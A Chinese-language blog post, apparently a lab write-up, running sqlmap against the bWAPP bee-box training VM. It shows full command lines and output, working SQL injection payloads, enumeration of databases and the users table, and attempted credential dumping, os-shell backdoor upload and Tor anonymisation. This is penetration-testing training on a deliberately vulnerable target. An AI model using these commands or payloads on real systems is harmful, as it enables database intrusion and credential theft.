[研究]sqlmap 1.9.2 對 bWAPP 2.2 bee-box v1.6.7 滲透測試
2025-05-12
環境:Visual Studio 2022 + ASP.NET + WebForm + Web Application + C# + SQL Server 2019 + SQL Server Management Studio (SSMS) 19
********************************************************************************
[研究] bWAPP 2.2 bee-box v1.6.7 免費、網路漏洞滲透測試學習平台
https://shaurong.blogspot.com/2016/12/bwapp-22-bee-box-v167.html
登入預設帳號 bee,預設密碼 bug
http://10.3.0.194/bWAPP/
http://10.3.0.194/
得到
ecurity_level=0; PHPSESSID=19b67d02186982b14e08ee0ef05bed48
✅ 1. 測試環境設定
目標靶場:bWAPP (可從 https://sourceforge.net/projects/bwapp/ 下載)
Web Server:例如 XAMPP / WAMP / Docker 上安裝 bWAPP
bWAPP 帳號:預設帳號 bee 密碼 bug
設置安全等級:進入 http://localhost/bWAPP/security_level_set.php → 設為 low
選擇漏洞類型:進入 http://localhost/bWAPP/sqli_1.php(SQL Injection (GET/Search))
✅ 2. 初步分析目標頁面
http://localhost/bWAPP/sqli_1.php
輸入任意字串(例如:test),送出查詢,網址會變為:
http://localhost/bWAPP/sqli_1.php?title=test
這表示 title 是 GET 參數,可能存在 SQL Injection 漏洞。
✅ 3. 使用 sqlmap 執行滲透測試
sqlmap -u "http://localhost/bWAPP/sqli_1.php?title=test" --cookie="PHPSESSID=xxx; security_level=0" --batch --risk=3 --level=5 --dbs
參數說明:
- -u:目標 URL
- --cookie:提供登入後的 Cookie(從瀏覽器開發工具複製)
- --batch:自動回答提示(無需手動操作)
- --risk / --level:增加測試範圍
- --dbs:列出資料庫
🔒 記得先登入 bWAPP,複製 Cookie 中的 PHPSESSID 和 security_level=0。
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://10.3.0.194/bWAPP/sqli_1.php?title=test" --cookie="PHPSESSID=19b67d02186982b14e08ee0ef05bed48; security_level=0" --batch --risk=3 --level=5 --dbs
___
__H__
___ ___["]_____ ___ ___ {1.9.2#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:50:03 /2025-05-11/
[23:50:03] [INFO] testing connection to the target URL
[23:50:03] [WARNING] potential CAPTCHA protection mechanism detected
[23:50:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:50:03] [INFO] testing if the target URL content is stable
[23:50:04] [INFO] target URL content is stable
[23:50:04] [INFO] testing if GET parameter 'title' is dynamic
[23:50:04] [WARNING] GET parameter 'title' does not appear to be dynamic
[23:50:04] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[23:50:04] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[23:50:04] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[23:50:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:50:04] [WARNING] reflective value(s) found and filtering out
[23:50:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:50:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[23:50:05] [INFO] GET parameter 'title' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --string="movies")
[23:50:05] [INFO] testing 'Generic inline queries'
[23:50:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:50:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:50:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:50:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:50:05] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:50:05] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[23:50:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[23:50:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[23:50:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:05] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:05] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:50:05] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:50:05] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:50:05] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:50:05] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:05] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[23:50:05] [INFO] GET parameter 'title' is 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' injectable
[23:50:05] [INFO] testing 'MySQL inline queries'
[23:50:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:50:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:50:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:50:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:50:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:50:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[23:50:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:50:15] [INFO] GET parameter 'title' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[23:50:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:50:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:50:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:50:15] [INFO] target URL appears to have 7 columns in query
[23:50:16] [INFO] GET parameter 'title' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[23:50:16] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 237 HTTP(s) requests:
---
Parameter: title (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: title=test' OR NOT 3202=3202-- iXQm
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: title=test' OR ROW(7430,8739)>(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7430=7430,1))),0x7170627671,FLOOR(RAND(0)*2))x FROM (SELECT 2468 UNION SELECT 1458 UNION SELECT 5198 UNION SELECT 3925)a GROUP BY x)-- CVzZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=test' AND (SELECT 3939 FROM (SELECT(SLEEP(5)))KRmL)-- XJGJ
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=test' UNION ALL SELECT NULL,CONCAT(0x7170767871,0x7050576d44746d415a4f454a4c4a77716a7750676270475a636563494d674b575847774d56616363,0x7170627671),NULL,NULL,NULL,NULL,NULL-- -
---
[23:50:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:50:16] [INFO] fetching database names
available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql
[23:50:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.3.0.194'
[*] ending @ 23:50:16 /2025-05-11/
┌──(kali㉿kali)-[~]
└─$
|
✅ 4. 查看資料庫列表
sqlmap 成功注入後,會列出類似以下結果:
available databases [5]:
[*] bwapp
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
✅ 5. 查看資料表與資料欄位
查詢 bwapp 資料庫的資料表:
sqlmap -u "http://localhost/bWAPP/sqli_1.php?title=test" --cookie="..." -D bwapp --tables
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://10.3.0.194/bWAPP/sqli_1.php?title=test" --cookie="PHPSESSID=19b67d02186982b14e08ee0ef05bed48; security_level=0" -D bwapp --tables
___
__H__
___ ___[,]_____ ___ ___ {1.9.2#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:52:32 /2025-05-11/
[23:52:32] [INFO] resuming back-end DBMS 'mysql'
[23:52:32] [INFO] testing connection to the target URL
[23:52:32] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: title=test' OR NOT 3202=3202-- iXQm
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: title=test' OR ROW(7430,8739)>(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7430=7430,1))),0x7170627671,FLOOR(RAND(0)*2))x FROM (SELECT 2468 UNION SELECT 1458 UNION SELECT 5198 UNION SELECT 3925)a GROUP BY x)-- CVzZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=test' AND (SELECT 3939 FROM (SELECT(SLEEP(5)))KRmL)-- XJGJ
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=test' UNION ALL SELECT NULL,CONCAT(0x7170767871,0x7050576d44746d415a4f454a4c4a77716a7750676270475a636563494d674b575847774d56616363,0x7170627671),NULL,NULL,NULL,NULL,NULL-- -
---
[23:52:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[23:52:32] [INFO] fetching tables for database: 'bwapp'
Database: bwapp
[5 tables]
+----------+
| blog |
| heroes |
| movies |
| users |
| visitors |
+----------+
[23:52:32] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.3.0.194'
[*] ending @ 23:52:32 /2025-05-11/
┌──(kali㉿kali)-[~]
└─$
|
查詢 users 表的欄位:
sqlmap -u "http://localhost/bWAPP/sqli_1.php?title=test" --cookie="..." -D bwapp -T users --columns
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://10.3.0.194/bWAPP/sqli_1.php?title=test" --cookie="PHPSESSID=19b67d02186982b14e08ee0ef05bed48; security_level=0" -D bwapp -T users --columns
___
__H__
___ ___[,]_____ ___ ___ {1.9.2#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:53:21 /2025-05-11/
[23:53:21] [INFO] resuming back-end DBMS 'mysql'
[23:53:21] [INFO] testing connection to the target URL
[23:53:22] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: title=test' OR NOT 3202=3202-- iXQm
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: title=test' OR ROW(7430,8739)>(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7430=7430,1))),0x7170627671,FLOOR(RAND(0)*2))x FROM (SELECT 2468 UNION SELECT 1458 UNION SELECT 5198 UNION SELECT 3925)a GROUP BY x)-- CVzZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=test' AND (SELECT 3939 FROM (SELECT(SLEEP(5)))KRmL)-- XJGJ
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=test' UNION ALL SELECT NULL,CONCAT(0x7170767871,0x7050576d44746d415a4f454a4c4a77716a7750676270475a636563494d674b575847774d56616363,0x7170627671),NULL,NULL,NULL,NULL,NULL-- -
---
[23:53:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[23:53:22] [INFO] fetching columns for table 'users' in database 'bwapp'
Database: bwapp
Table: users
[9 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| admin | tinyint(1) |
| activated | tinyint(1) |
| activation_code | varchar(100) |
| email | varchar(100) |
| id | int(10) |
| login | varchar(100) |
| password | varchar(100) |
| reset_code | varchar(100) |
| secret | varchar(100) |
+-----------------+--------------+
[23:53:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.3.0.194'
[*] ending @ 23:53:22 /2025-05-11/
┌──(kali㉿kali)-[~]
└─$
|
Dump 出 users 表的帳號密碼:
sqlmap -u "http://localhost/bWAPP/sqli_1.php?title=test" --cookie="..." -D bwapp -T users -C login,password --dump
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://10.3.0.194/bWAPP/sqli_1.php?title=test" --cookie="PHPSESSID=19b67d02186982b14e08ee0ef05bed48; security_level=0" -D bwapp -T users -C login,password --dump
___
__H__
___ ___["]_____ ___ ___ {1.9.2#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:54:16 /2025-05-11/
[23:54:16] [INFO] resuming back-end DBMS 'mysql'
[23:54:16] [INFO] testing connection to the target URL
[23:54:17] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: title=test' OR NOT 3202=3202-- iXQm
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: title=test' OR ROW(7430,8739)>(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7430=7430,1))),0x7170627671,FLOOR(RAND(0)*2))x FROM (SELECT 2468 UNION SELECT 1458 UNION SELECT 5198 UNION SELECT 3925)a GROUP BY x)-- CVzZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=test' AND (SELECT 3939 FROM (SELECT(SLEEP(5)))KRmL)-- XJGJ
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=test' UNION ALL SELECT NULL,CONCAT(0x7170767871,0x7050576d44746d415a4f454a4c4a77716a7750676270475a636563494d674b575847774d56616363,0x7170627671),NULL,NULL,NULL,NULL,NULL-- -
---
[23:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:54:17] [INFO] fetching entries of column(s) 'login,password' for table 'users' in database 'bwapp'
[23:54:17] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[23:54:17] [WARNING] the SQL query provided does not return any output
[23:54:17] [WARNING] the SQL query provided does not return any output
[23:54:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[23:54:17] [INFO] fetching number of column(s) 'login,password' entries for table 'users' in database 'bwapp'
[23:54:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:54:17] [INFO] retrieved:
[23:54:17] [WARNING] time-based comparison requires larger statistical model, please wait................. (done)
[23:54:17] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[23:54:17] [WARNING] unable to retrieve the number of column(s) 'login,password' entries for table 'users' in database 'bwapp'
[23:54:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.3.0.194'
[*] ending @ 23:54:17 /2025-05-11/
┌──(kali㉿kali)-[~]
└─$
|
筆者註:帳號密碼好像沒有成功列出來
✅ 6. 進階功能(選用)
取得 shell(若允許寫入權限):
sqlmap -u "http://localhost/bWAPP/sqli_1.php?title=test" --cookie="..." --os-shell
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://10.3.0.194/bWAPP/sqli_1.php?title=test" --cookie="PHPSESSID=1ffdb7b171b1a61e001aa5ac99b56286" --os-shell
___
__H__
___ ___[(]_____ ___ ___ {1.9.2#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:36:57 /2025-05-12/
[01:36:57] [INFO] resuming back-end DBMS 'mysql'
[01:36:57] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.3.0.194/bWAPP/security_level_set.php'. Do you want to follow? [Y/n]
[01:36:59] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: title=test' OR NOT 3202=3202-- iXQm
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: title=test' OR ROW(7430,8739)>(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7430=7430,1))),0x7170627671,FLOOR(RAND(0)*2))x FROM (SELECT 2468 UNION SELECT 1458 UNION SELECT 5198 UNION SELECT 3925)a GROUP BY x)-- CVzZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=test' AND (SELECT 3939 FROM (SELECT(SLEEP(5)))KRmL)-- XJGJ
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=test' UNION ALL SELECT NULL,CONCAT(0x7170767871,0x7050576d44746d415a4f454a4c4a77716a7750676270475a636563494d674b575847774d56616363,0x7170627671),NULL,NULL,NULL,NULL,NULL-- -
---
[01:36:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[01:36:59] [INFO] going to use a web backdoor for command prompt
[01:36:59] [INFO] fingerprinting the back-end DBMS operating system
[01:36:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:36:59] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[01:37:09] [INFO] retrieved the web server document root: '/var/www'
[01:37:09] [INFO] retrieved web server absolute paths: '/bWAPP/sqli_1~.php, /var/www/bWAPP/security.php'
[01:37:09] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[01:37:09] [WARNING] unable to upload the file stager on '/var/www/'
[01:37:09] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[01:37:09] [WARNING] expect junk characters inside the file as a leftover from UNION query
[01:37:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:37:09] [INFO] trying to upload the file stager on '/var/www/bWAPP/' via LIMIT 'LINES TERMINATED BY' method
[01:37:09] [WARNING] unable to upload the file stager on '/var/www/bWAPP/'
[01:37:09] [INFO] trying to upload the file stager on '/var/www/bWAPP/' via UNION method
[01:37:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:37:09] [INFO] trying to upload the file stager on '/bWAPP/' via LIMIT 'LINES TERMINATED BY' method
[01:37:09] [WARNING] unable to upload the file stager on '/bWAPP/'
[01:37:09] [INFO] trying to upload the file stager on '/bWAPP/' via UNION method
[01:37:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:37:09] [INFO] trying to upload the file stager on '/bWAPP/bWAPP/' via LIMIT 'LINES TERMINATED BY' method
[01:37:09] [WARNING] unable to upload the file stager on '/bWAPP/bWAPP/'
[01:37:09] [INFO] trying to upload the file stager on '/bWAPP/bWAPP/' via UNION method
[01:37:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:37:09] [INFO] trying to upload the file stager on '/var/www/bWAPP/' via LIMIT 'LINES TERMINATED BY' method
[01:37:09] [INFO] trying to upload the file stager on '/var/www/bWAPP/' via UNION method
[01:37:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:37:09] [INFO] trying to upload the file stager on '/var/www/bWAPP/bWAPP/' via LIMIT 'LINES TERMINATED BY' method
[01:37:09] [WARNING] unable to upload the file stager on '/var/www/bWAPP/bWAPP/'
[01:37:09] [INFO] trying to upload the file stager on '/var/www/bWAPP/bWAPP/' via UNION method
[01:37:09] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[01:37:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 43 times
[01:37:09] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.3.0.194'
[*] ending @ 01:37:09 /2025-05-12/
┌──(kali㉿kali)-[~]
└─$
|
使用 TOR 匿名(選用):
sqlmap -u "..." --tor --tor-type=SOCKS5 --check-tor
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://10.3.0.194/bWAPP/sqli_1.php?title=test" --tor --tor-type=SOCKS5 --check-tor
___
__H__
___ ___[)]_____ ___ ___ {1.9.2#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:38:55 /2025-05-12/
[01:38:55] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
[01:38:56] [INFO] setting Tor SOCKS proxy settings
[01:38:56] [CRITICAL] can't establish connection with the Tor SOCKS proxy. Please make sure that you have Tor service installed and setup so you could be able to successfully use switch '--tor'
[*] ending @ 01:38:55 /2025-05-12/
┌──(kali㉿kali)-[~]
└─$
|
⚠️ 注意事項
- 僅限合法授權環境操作!
- 若 bWAPP 沒有回傳資料,請確認:
- Cookie 正確
- 安全等級設定為 low
- 測試頁面支援 SQL 注入
- 可搭配 Burp Suite 輔助攔截與分析參數
(完)
相關
沒有留言:
張貼留言